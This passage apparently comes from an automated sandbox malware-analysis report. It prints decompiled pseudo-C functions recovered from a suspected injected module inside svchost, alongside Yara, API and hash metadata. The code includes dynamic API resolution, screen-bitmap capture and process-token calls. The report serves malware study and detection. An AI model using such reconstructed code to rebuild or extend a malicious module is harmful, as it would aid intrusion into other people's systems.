                                                            				/* 0x22baf576158 */ if (r13b != 0xa) goto 0xaf57618e;
                                                            				/* 0x22baf57615e */ _t50 = _t142 + 0xd; // 0xd
                                                            				/* 0x22baf576161 */ _v152 = _t142;
                                                            				/* 0x22baf576166 */ _t52 = _t142 + 1; // 0x1
                                                            				/* 0x22baf576166 */ r8d = _t52;
                                                            				/* 0x22baf57616e */ _v116 = _t50;
                                                            				/* 0x22baf576180 */ if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0xaf5761ae;
                                                            				/* 0x22baf576186 */ if (_v112 - 1 < 0) goto 0xaf5761b6;
                                                            				/* 0x22baf576188 */  *((intOrPtr*)(_t127 + 8)) =  *((intOrPtr*)(_t127 + 8)) + 1;
                                                            				/* 0x22baf57618b */  *((intOrPtr*)(_t127 + 4)) =  *((intOrPtr*)(_t127 + 4)) + 1;
                                                            				/* 0x22baf576191 */ goto 0xaf57604c;
                                                            				/* 0x22baf57619c */  *((char*)( *((intOrPtr*)(0xaf599790 + _t163 * 8)) + _t148 + 0x3e)) =  *((intOrPtr*)(_t145 + 1));
                                                            				/* 0x22baf5761a4 */  *( *((intOrPtr*)(0xaf599790 + _t163 * 8)) + _t148 + 0x3d) =  *( *((intOrPtr*)(0xaf599790 + _t163 * 8)) + _t148 + 0x3d) | 0x00000004;
                                                            				/* 0x22baf5761a9 */  *((intOrPtr*)(_t127 + 4)) =  *((intOrPtr*)(_t127 + 4)) + 1;
                                                            				/* 0x22baf5761ac */ goto 0xaf5761b6;
                                                            				/* 0x22baf5761b4 */  *_t127 = GetLastError();
                                                            				/* 0x22baf5761df */ return E0000022B22BAF55A7C0( *((intOrPtr*)(_t127 + 8)) - _v96 + __edi, _t127, _v72 ^ _t150 - 0x00000080);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 3659116390-0
                                                            • Opcode ID: 434b4124afa634618df54b116c8fb812a7d0b25ff49f88d0f3b0970f47e539e7
                                                            • Instruction ID: 9a3cad3258c8ae5cf7608128a7647974d56fcdf586ce006f78c9a5efe795b030
                                                            • Opcode Fuzzy Hash: 434b4124afa634618df54b116c8fb812a7d0b25ff49f88d0f3b0970f47e539e7
                                                            • Instruction Fuzzy Hash: 5F519D33A10A50A9EB22CFA5D94C3DD7BB0F744B98F048515DE4A57A9ADF35C146C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0000022B22BAF53A310(void* __ecx, void* __eflags, long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __r8) {
                                                            				void* _t46;
                                                            				signed long long _t55;
                                                            				long long _t74;
                                                            				void* _t77;
                                                            				void* _t78;
                                                            				void* _t80;
                                                            				signed long long _t81;
                                                            
                                                            				/* 0x22baf53a310 */ _t74 = __rdi;
                                                            				/* 0x22baf53a310 */ _t46 = __ecx;
                                                            				/* 0x22baf53a310 */  *((long long*)(_t80 + 8)) = __rbx;
                                                            				/* 0x22baf53a315 */  *((long long*)(_t80 + 0x10)) = __rdi;
                                                            				/* 0x22baf53a31b */ _t78 = _t80 - 0xc0;
                                                            				/* 0x22baf53a323 */ _t81 = _t80 - 0x1c0;
                                                            				/* 0x22baf53a32a */ _t55 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				/* 0x22baf53a334 */  *(_t78 + 0xb0) = _t55 ^ _t81;
                                                            				/* 0x22baf53a347 */ E0000022B22BAF538B60(_t55 ^ _t81, __rbx, _t81 + 0x30, __rdi, __rsi);
                                                            				/* 0x22baf53a34e */  *((char*)(_t78 - 0x60)) = 0x43;
                                                            				/* 0x22baf53a359 */  *((long long*)(_t78 - 0x80)) = _t74;
                                                            				/* 0x22baf53a35d */  *((long long*)(_t81 + 0x78)) = 0xaf588810;
                                                            				/* 0x22baf53a36e */  *((long long*)(_t78 - 0x70)) = _t74;
                                                            				/* 0x22baf53a375 */  *((long long*)(_t78 - 0x78)) = 0xaf5887c8;
                                                            				/* 0x22baf53a379 */  *((intOrPtr*)(_t78 - 0x38)) = 0;
                                                            				/* 0x22baf53a37c */  *((long long*)(_t78 - 0x48)) = _t74;
                                                            				/* 0x22baf53a380 */  *((long long*)(_t78 - 0x40)) = _t74;
                                                            				/* 0x22baf53a384 */  *((intOrPtr*)(_t78 - 0x5c)) = 0;
                                                            				/* 0x22baf53a387 */  *((long long*)(_t81 + 0x68)) = _t74;
                                                            				/* 0x22baf53a38c */  *((long long*)(_t81 + 0x70)) = _t74;
                                                            				/* 0x22baf53a391 */  *((long long*)(_t78 - 0x68)) = _t74;
                                                            				/* 0x22baf53a395 */ E0000022B22BAF53A030();
                                                            				/* 0x22baf53a39e */ r8d =  *0xaf5958f0 & 0x0000ffff;
                                                            				/* 0x22baf53a3a6 */  *((long long*)(_t78 - 0x58)) = _t74;
                                                            				/* 0x22baf53a3ae */ if (( *(_t78 - 0x30) & 0x0000ffff) != 1) goto 0xaf53a44c;
                                                            				/* 0x22baf53a3c0 */  *((short*)(_t81 + 0x28)) = 0;
                                                            				/* 0x22baf53a3c5 */ r9d = 0;
                                                            				/* 0x22baf53a3c8 */  *((long long*)(_t81 + 0x20)) = _t74;
                                                            				/* 0x22baf53a3d4 */ if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x68))))))(_t77) != 0) goto 0xaf53a4b9;
                                                            				/* 0x22baf53a3e2 */ E0000022B22BAF53A220( *0xaf599c28 & 0xffff, _t81 + 0x30);
                                                            				/* 0x22baf53a3ee */ if ( *((intOrPtr*)(_t78 - 0x48)) == 0) goto 0xaf53a3f5;
                                                            				/* 0x22baf53a3f0 */ E0000022B22BAF55A7E4( *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x68)))),  *((intOrPtr*)(_t78 - 0x48)));
                                                            				/* 0x22baf53a401 */  *((long long*)(_t78 - 0x78)) = 0xaf588690;
                                                            				/* 0x22baf53a40c */  *((long long*)(_t81 + 0x78)) = 0xaf588790;
                                                            				/* 0x22baf53a411 */  *((intOrPtr*)(_t78 - 0x38)) = 0;
                                                            				/* 0x22baf53a414 */  *((long long*)(_t78 - 0x48)) = _t74;
                                                            				/* 0x22baf53a418 */  *((long long*)(_t78 - 0x40)) = _t74;
                                                            				/* 0x22baf53a41f */ if ( *((intOrPtr*)(_t81 + 0x60)) == 0) goto 0xaf53a426;
                                                            				/* 0x22baf53a421 */ E0000022B22BAF55A7E4(0xaf588790,  *((intOrPtr*)(_t81 + 0x60)));
                                                            				/* 0x22baf53a44b */ return E0000022B22BAF55A7C0(_t46, 0xaf588790,  *(_t78 + 0xb0) ^ _t81);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$Close$DeleteDesktopHandleLibraryLoadReleaseSleep
                                                            • String ID:
                                                            • API String ID: 3912153519-0
                                                            • Opcode ID: 4dd78ee09022e8c28f5d897e7a244c3b1690d1402d5fbdc85ac9ff286346804e
                                                            • Instruction ID: 91394fc81f22cc023c5931d93b5220c09fe0886c281816b8fdc19aec4908d270
                                                            • Opcode Fuzzy Hash: 4dd78ee09022e8c28f5d897e7a244c3b1690d1402d5fbdc85ac9ff286346804e
                                                            • Instruction Fuzzy Hash: 5C612A37610B80A9EB21DFA5E89C2DD77B4FB84798F500116DA8D47AAADF3AC445C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0000022B22BAF53B270(void* __ecx, void* __eflags, long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __r8) {
                                                            				void* _t46;
                                                            				signed long long _t55;
                                                            				long long _t74;
                                                            				void* _t77;
                                                            				void* _t78;
                                                            				void* _t80;
                                                            				signed long long _t81;
                                                            
                                                            				_t74 = __rdi;
                                                            				_t46 = __ecx;
                                                            				 *((long long*)(_t80 + 8)) = __rbx;
                                                            				 *((long long*)(_t80 + 0x10)) = __rdi;
                                                            				_t78 = _t80 - 0x140;
                                                            				_t81 = _t80 - 0x240;
                                                            				_t55 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t78 + 0x130) = _t55 ^ _t81;
                                                            				E0000022B22BAF538B60(_t55 ^ _t81, __rbx, _t81 + 0x30, __rdi, __rsi);
                                                            				 *((char*)(_t78 - 0x60)) = 0x43;
                                                            				 *((long long*)(_t78 - 0x80)) = _t74;
                                                            				 *((long long*)(_t81 + 0x78)) = 0xaf588810;
                                                            				 *((long long*)(_t78 - 0x70)) = _t74;
                                                            				 *((long long*)(_t78 - 0x78)) = 0xaf5887c8;
                                                            				 *((intOrPtr*)(_t78 - 0x38)) = 0;
                                                            				 *((long long*)(_t78 - 0x48)) = _t74;
                                                            				 *((long long*)(_t78 - 0x40)) = _t74;
                                                            				 *((intOrPtr*)(_t78 - 0x5c)) = 0;
                                                            				 *((long long*)(_t81 + 0x68)) = _t74;
                                                            				 *((long long*)(_t81 + 0x70)) = _t74;
                                                            				 *((long long*)(_t78 - 0x68)) = _t74;
                                                            				E0000022B22BAF53A030();
                                                            				r8d =  *0xaf5958f0 & 0x0000ffff;
                                                            				 *((long long*)(_t78 - 0x58)) = _t74;
                                                            				if (( *(_t78 - 0x30) & 0x0000ffff) != 1) goto 0xaf53b3ac;
                                                            				 *((short*)(_t81 + 0x28)) = 0;
                                                            				r9d = 0;
                                                            				 *((long long*)(_t81 + 0x20)) = _t74;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x68))))))(_t77) != 0) goto 0xaf53b419;
                                                            				E0000022B22BAF53A220( *0xaf599c28 & 0xffff, _t81 + 0x30);
                                                            				if ( *((intOrPtr*)(_t78 - 0x48)) == 0) goto 0xaf53b355;
                                                            				E0000022B22BAF55A7E4( *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x68)))),  *((intOrPtr*)(_t78 - 0x48)));
                                                            				 *((long long*)(_t78 - 0x78)) = 0xaf588690;
                                                            				 *((long long*)(_t81 + 0x78)) = 0xaf588790;
                                                            				 *((intOrPtr*)(_t78 - 0x38)) = 0;
                                                            				 *((long long*)(_t78 - 0x48)) = _t74;
                                                            				 *((long long*)(_t78 - 0x40)) = _t74;
                                                            				if ( *((intOrPtr*)(_t81 + 0x60)) == 0) goto 0xaf53b386;
                                                            				E0000022B22BAF55A7E4(0xaf588790,  *((intOrPtr*)(_t81 + 0x60)));
                                                            				return E0000022B22BAF55A7C0(_t46, 0xaf588790,  *(_t78 + 0x130) ^ _t81);
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressCloseHandleProc$LibraryLoadObjectSingleSleepWait
                                                            • String ID:
                                                            • API String ID: 594132814-0
                                                            • Opcode ID: 0e57eb95f36bce82815cf22166d20aa81c2455632047c3aed7f0ec454f53c864
                                                            • Instruction ID: 54568a3347231ec395ac4a3bfe7b08215dcabd8729f675cd61821081e6c77d52
                                                            • Opcode Fuzzy Hash: 0e57eb95f36bce82815cf22166d20aa81c2455632047c3aed7f0ec454f53c864
                                                            • Instruction Fuzzy Hash: 77612B33610B44A9EB21CFA9E8A82DD77F4FB84798F500216DA9D43AAADF39C445C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Timetime$FreeHeap
                                                            • String ID:
                                                            • API String ID: 3205547609-0
                                                            • Opcode ID: dc98cffcc3435f71589508573339223eab46a8408da5854a14efb6f641a941b0
                                                            • Instruction ID: ee89ddf638701efa4f6b53b9335ba55b8d2f7643111c482131a5b6eaa24f2561
                                                            • Opcode Fuzzy Hash: dc98cffcc3435f71589508573339223eab46a8408da5854a14efb6f641a941b0
                                                            • Instruction Fuzzy Hash: 5351B737201A5096E7239FAAD44C39E73A5F784F98F198425CE595779ADF3AC882C3C0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E0000022B22BAF533F50(void* __eax, signed char __ecx, long long __rbx, long long __rcx, unsigned int __rdx, long long __r8, void* _a8, long long _a16, void* _a24, long long _a32) {
                                                            				long long _v48;
                                                            				long long _v56;
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* _t43;
                                                            				signed char _t44;
                                                            				void* _t46;
                                                            				void* _t47;
                                                            				void* _t48;
                                                            				intOrPtr _t73;
                                                            				void* _t74;
                                                            				intOrPtr _t76;
                                                            				long long* _t81;
                                                            				unsigned long long _t86;
                                                            				long long _t90;
                                                            				void* _t91;
                                                            				long long _t102;
                                                            				long long _t106;
                                                            				unsigned long long _t111;
                                                            				signed long long _t116;
                                                            				signed long long _t118;
                                                            
                                                            				_t44 = __ecx;
                                                            				_a24 = __r8;
                                                            				_a16 = __rdx;
                                                            				_a8 = __rcx;
                                                            				_v48 = 0xfffffffe;
                                                            				_a32 = __rbx;
                                                            				if ((__rdx | 0x00000007) - 0xfffffffe <= 0) goto 0xaf533f9a;
                                                            				goto 0xaf533fcb;
                                                            				_t111 =  *((intOrPtr*)(__rcx + 0x18));
                                                            				_t86 = _t111 >> 1;
                                                            				if (_t86 - __rdx >> 1 <= 0) goto 0xaf533fcb;
                                                            				if (_t111 - 0xfffffffe - _t86 <= 0) goto 0xaf533fcb;
                                                            				if (0x7fffffffffffffff != 0) goto 0xaf533fe6;
                                                            				r14d = 0;
                                                            				_t47 = r14d;
                                                            				goto 0xaf53402c;
                                                            				if (0x7fffffffffffffff - 0xffffffff <= 0) goto 0xaf533ff0;
                                                            				E0000022B22BAF55B374(0x7fffffffffffffff - 0xffffffff, 0x7fffffffffffffff);
                                                            				if (0xfffffffffffffffe - 0x1000 < 0) goto 0xaf534021;
                                                            				if (0x25 - 0xfffffffffffffffe > 0) goto 0xaf53400b;
                                                            				E0000022B22BAF55B374(0x25 - 0xfffffffffffffffe, 0x25);
                                                            				E0000022B22BAF55A7EC(0x25, 0x25);
                                                            				 *0x00000038 = 0x25;
                                                            				goto 0xaf534029;
                                                            				E0000022B22BAF55A7EC(0x25, 0x25);
                                                            				r14d = 0;
                                                            				_v56 = 0x25;
                                                            				r14d = 0;
                                                            				_t81 = _a8;
                                                            				_t118 = _a24;
                                                            				_t102 = _a16;
                                                            				_t106 = _v56;
                                                            				if (_t118 == 0) goto 0xaf534079;
                                                            				if ( *((long long*)(_t81 + 0x18)) - 8 < 0) goto 0xaf534065;
                                                            				goto 0xaf534068;
                                                            				if (_t118 == 0) goto 0xaf534079;
                                                            				_t43 = E0000022B22BAF562BA0(__ecx, _t46, _t47, _t48, _t106, _t81, _t102, _t106, _t118 + _t118);
                                                            				_t73 =  *((intOrPtr*)(_t81 + 0x18));
                                                            				if (_t73 - 8 < 0) goto 0xaf5340dc;
                                                            				_t74 = _t73 + 1;
                                                            				_t90 =  *_t81;
                                                            				if (_t74 - 0xffffffff <= 0) goto 0xaf534094;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				if (_t74 + _t74 - 0x1000 < 0) goto 0xaf5340d7;
                                                            				if ((_t44 & 0x0000001f) == 0) goto 0xaf5340aa;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t76 =  *((intOrPtr*)(_t90 - 8));
                                                            				if (_t76 - _t90 < 0) goto 0xaf5340b9;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				_t91 = _t90 - _t76;
                                                            				if (_t91 - 8 >= 0) goto 0xaf5340c8;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				if (_t91 - 0x27 <= 0) goto 0xaf5340d4;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				0xaf55a85c();
                                                            				 *((long long*)(_t81 + 0x18)) = 7;
                                                            				 *(_t81 + 0x10) = _t116;
                                                            				if ( *((long long*)(_t81 + 0x18)) - 8 < 0) goto 0xaf5340f4;
                                                            				goto 0xaf5340f7;
                                                            				 *_t81 = r14w;
                                                            				 *_t81 = _t106;
                                                            				 *((long long*)(_t81 + 0x18)) = _t102;
                                                            				 *(_t81 + 0x10) = _t118;
                                                            				if ( *((long long*)(_t81 + 0x18)) - 8 < 0) goto 0xaf534110;
                                                            				 *((intOrPtr*)(_t106 + _t118 * 2)) = r14w;
                                                            				return _t43;
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$ExceptionThrowstd::bad_alloc::bad_alloc
                                                            • String ID:
                                                            • API String ID: 545805781-0
                                                            • Opcode ID: 7529e5906e87b3715305b4374d1fc76e318a1d532acb5d33b004be61e9267215
                                                            • Instruction ID: 6f859baeeadef4b5f36e6535dc37084ffdf4c58b074ffde26c3613a4e5ef318a
                                                            • Opcode Fuzzy Hash: 7529e5906e87b3715305b4374d1fc76e318a1d532acb5d33b004be61e9267215
                                                            • Instruction Fuzzy Hash: E441C523714744A1EA3A9BE9D06D3DD77A0E744BE4F5407209A790B7E7DF7AC491C280
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 49%
                                                            			E0000022B22BAF533CA0(signed int __edx, long long __rbx, void* __rdx, signed int __r8, long long _a8, signed long long _a16, long long _a24) {
                                                            				long long _v56;
                                                            				void* _t23;
                                                            				void* _t24;
                                                            				signed long long _t42;
                                                            				long long _t44;
                                                            				void* _t46;
                                                            				signed long long _t51;
                                                            				void* _t56;
                                                            				signed long long _t57;
                                                            				long long _t63;
                                                            				signed long long _t66;
                                                            				void* _t81;
                                                            				intOrPtr _t83;
                                                            				void* _t85;
                                                            				void* _t91;
                                                            				signed long long _t92;
                                                            
                                                            				if (__r8 - 0xffffffff > 0) goto 0xaf533cec;
                                                            				if (__r8 << 5 - 0x1000 < 0) goto 0xaf533ce0;
                                                            				if ((__edx & 0x0000001f) != 0) goto 0xaf533cf2;
                                                            				_t42 =  *((intOrPtr*)(__rdx - 8));
                                                            				if (_t42 - __rdx >= 0) goto 0xaf533cf8;
                                                            				_t56 = __rdx - _t42;
                                                            				if (_t56 - 8 < 0) goto 0xaf533cfe;
                                                            				if (_t56 - 0x27 > 0) goto 0xaf533d04;
                                                            				_t57 = _t42;
                                                            				goto 0xaf55a85c;
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				E0000022B22BAF564348();
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				asm("int3");
                                                            				_a16 = _t57;
                                                            				_v56 = 0xfffffffe;
                                                            				_a8 = __rbx;
                                                            				_t66 = _t57;
                                                            				_t92 = _t57;
                                                            				if (_t57 != 0) goto 0xaf533d3e;
                                                            				goto 0xaf533d90;
                                                            				if (_t66 - 0xffffffff <= 0) goto 0xaf533d53;
                                                            				E0000022B22BAF55B374(_t66 - 0xffffffff, 0xffffffff);
                                                            				asm("int3");
                                                            				_t51 = _t66 << 5;
                                                            				if (_t51 - 0x1000 < 0) goto 0xaf533d88;
                                                            				_t44 = _t51 + 0x27;
                                                            				if (_t44 - _t51 > 0) goto 0xaf533d72;
                                                            				E0000022B22BAF55B374(_t44 - _t51, _t44);
                                                            				asm("int3");
                                                            				E0000022B22BAF55A7EC(_t44, _t44);
                                                            				_t8 = _t44 + 0x27; // 0x27
                                                            				 *((long long*)((_t8 & 0xffffffe0) - 8)) = _t44;
                                                            				goto 0xaf533d90;
                                                            				E0000022B22BAF55A7EC(_t44, _t44);
                                                            				_t63 = _t44;
                                                            				_a24 = _t63;
                                                            				E0000022B22BAF5341E0(__rbx,  *_t92,  *((intOrPtr*)(_t92 + 8)), _t63, _t81, _t91, _t85);
                                                            				_t83 =  *((intOrPtr*)(_t92 + 8));
                                                            				_t46 =  *_t92;
                                                            				if (_t46 == 0) goto 0xaf533de4;
                                                            				if (_t46 == _t83) goto 0xaf533dd1;
                                                            				E0000022B22BAF5339E0(_t24, _t46);
                                                            				if (_t46 + 0x20 != _t83) goto 0xaf533dc0;
                                                            				_t23 = E0000022B22BAF533CA0(__edx, _t46 + 0x20,  *_t92,  *((intOrPtr*)(_t92 + 0x10)) -  *_t92 >> 5);
                                                            				 *((long long*)(_t92 + 0x10)) = (_t66 << 5) + _t63;
                                                            				 *((long long*)(_t92 + 8)) = (_t83 - _t46 & 0xffffffe0) + _t63;
                                                            				 *_t92 = _t63;
                                                            				return _t23;
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 3668304517-0
                                                            • Opcode ID: 616776360d69c0df53f5b8a98a5ba5b6477e15545e62a79319f9d1e792d08afc
                                                            • Instruction ID: d7b161c84374587e28d5ea8ddeb0785b55b994ec6d070ad3e320156cdc0f4546
                                                            • Opcode Fuzzy Hash: 616776360d69c0df53f5b8a98a5ba5b6477e15545e62a79319f9d1e792d08afc
                                                            • Instruction Fuzzy Hash: D931F0A771178461E936AAEAE41D3DD73A0AB047F0F165B229A7903BD7EF76C0818300
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 36%
                                                            			E0000022B22BAF56F93C(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                            				signed long long _t72;
                                                            				signed long long _t76;
                                                            				intOrPtr _t78;
                                                            				signed long long _t80;
                                                            				signed long long _t89;
                                                            				struct HINSTANCE__* _t94;
                                                            				signed long long _t95;
                                                            				long long _t101;
                                                            				void* _t105;
                                                            				signed long long _t109;
                                                            				signed long long _t111;
                                                            				signed long long _t114;
                                                            				struct HINSTANCE__* _t115;
                                                            				long _t118;
                                                            				void* _t121;
                                                            				WCHAR* _t123;
                                                            
                                                            				 *((long long*)(_t105 + 8)) = __rbx;
                                                            				 *((long long*)(_t105 + 0x10)) = _t101;
                                                            				 *((long long*)(_t105 + 0x18)) = __rsi;
                                                            				r14d = __ecx;
                                                            				_t111 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t95 = _t94 | 0xffffffff;
                                                            				_t89 = _t111 ^  *(0x22baf530000 + 0x69630 + _t121 * 8);
                                                            				asm("dec eax");
                                                            				if (_t89 == _t95) goto 0xaf56fabd;
                                                            				if (_t89 == 0) goto 0xaf56f9a5;
                                                            				_t72 = _t89;
                                                            				goto 0xaf56fabf;
                                                            				if (__r8 == __r9) goto 0xaf56fa51;
                                                            				_t78 =  *((intOrPtr*)(0x22baf530000 + 0x69590 + __rsi * 8));
                                                            				if (_t78 == 0) goto 0xaf56f9c5;
                                                            				if (_t78 == _t95) goto 0xaf56fa3d;
                                                            				goto 0xaf56fa38;
                                                            				r8d = 0x800;
                                                            				LoadLibraryExW(_t123, _t121, _t118);
                                                            				if (_t72 != 0) goto 0xaf56fa06;
                                                            				if (GetLastError() != 0x57) goto 0xaf56fa04;
                                                            				r8d = 0;
                                                            				LoadLibraryExW(??, ??, ??);
                                                            				_t80 = _t72;
                                                            				goto 0xaf56fa06;
                                                            				if (_t80 != 0) goto 0xaf56fa1f;
                                                            				 *((intOrPtr*)(0x22baf530000 + 0x69590 + __rsi * 8)) = _t95;
                                                            				goto 0xaf56fa3d;
                                                            				_t19 = 0x22baf530000 + 0x69590 + __rsi * 8;
                                                            				_t76 =  *_t19;
                                                            				 *_t19 = _t80;
                                                            				if (_t76 == 0) goto 0xaf56fa38;
                                                            				FreeLibrary(_t115);
                                                            				if (_t80 != 0) goto 0xaf56fa92;
                                                            				if (__r8 + 4 != __r9) goto 0xaf56f9ae;
                                                            				if (_t80 == 0) goto 0xaf56faa2;
                                                            				GetProcAddress(_t94);
                                                            				if (_t76 == 0) goto 0xaf56fa9b;
                                                            				_t109 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				asm("dec eax");
                                                            				 *(0x22baf530000 + 0x69630 + _t121 * 8) = _t76 ^ _t109;
                                                            				goto 0xaf56fabf;
                                                            				goto 0xaf56fa53;
                                                            				_t114 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				asm("dec eax");
                                                            				 *(0x22baf530000 + 0x69630 + _t121 * 8) = _t95 ^ _t114;
                                                            				return 0;
                                                            			}

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: 717f19dee890c743ff497cff9dc4f55f409a4d8d9a6bbcdf6155fbe71b371401
                                                            • Instruction ID: c227755f3c7d40218253031e27ca7b6bc95c5ad0c7f40cfb6039390f4abc3e88
                                                            • Opcode Fuzzy Hash: 717f19dee890c743ff497cff9dc4f55f409a4d8d9a6bbcdf6155fbe71b371401
                                                            • Instruction Fuzzy Hash: E741A463722A40A1FE779BD6A80C7D673D6BB44BD0F0D49259D2A4B78AFF3AC4458340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BitmapBitsCompatibleCreateDeleteObjectRelease
                                                            • String ID:
                                                            • API String ID: 3052192651-0
                                                            • Opcode ID: cf0a33bfc9bcf8ff794640d93449a68581bc70b957ab1fb0424cdb9c820731d4
                                                            • Instruction ID: 20d06fde2ca8e9f9006e7feb9d7568414f839e8e5567890584a645b6411ba6b3
                                                            • Opcode Fuzzy Hash: cf0a33bfc9bcf8ff794640d93449a68581bc70b957ab1fb0424cdb9c820731d4
                                                            • Instruction Fuzzy Hash: 81312637601790A6E7298B61A85D66DBFE4F385BC1F49C12ADF9607BA2DF39C001C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E0000022B22BAF5478C0(long long __rbx, void* __rcx, void* __rdx, long long _a24) {
                                                            				signed int _v24;
                                                            				char _v536;
                                                            				char _v1048;
                                                            				char _v1056;
                                                            				signed long long _v1064;
                                                            				intOrPtr _v1072;
                                                            				char _v1076;
                                                            				char _v1080;
                                                            				long long _v1096;
                                                            				long long _v1104;
                                                            				long long _v1112;
                                                            				void* __rdi;
                                                            				void* _t48;
                                                            				signed int _t51;
                                                            				void* _t58;
                                                            				void* _t59;
                                                            				signed long long _t68;
                                                            				signed long long _t69;
                                                            				intOrPtr* _t70;
                                                            				signed short* _t75;
                                                            				void* _t78;
                                                            				void* _t95;
                                                            				void* _t97;
                                                            				void* _t98;
                                                            				void* _t101;
                                                            
                                                            				_a24 = __rbx;
                                                            				_t68 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t69 = _t68 ^ _t98 - 0x00000470;
                                                            				_v24 = _t69;
                                                            				_t95 = __rdx;
                                                            				_t78 = __rcx;
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t48, 0, _t58, _t59, __rdx, __rdx, __rdx, _t101);
                                                            				_v1064 = _t69;
                                                            				r8d = 0x200;
                                                            				_v1080 = 0;
                                                            				E0000022B22BAF563830(_t48, 0, _t58, _t59,  &_v1048, __rdx, __rdx, _t101);
                                                            				r8d = 0x200;
                                                            				E0000022B22BAF563830(_t48, 0, _t58, _t59,  &_v536, __rdx, __rdx, _t101);
                                                            				_v1076 = 0x100;
                                                            				_v1072 = 0x100;
                                                            				if (OpenProcessToken(??, ??, ??) == 0) goto 0xaf547a34;
                                                            				r9d = _v1080;
                                                            				_t70 =  &_v1080;
                                                            				r8d = 0;
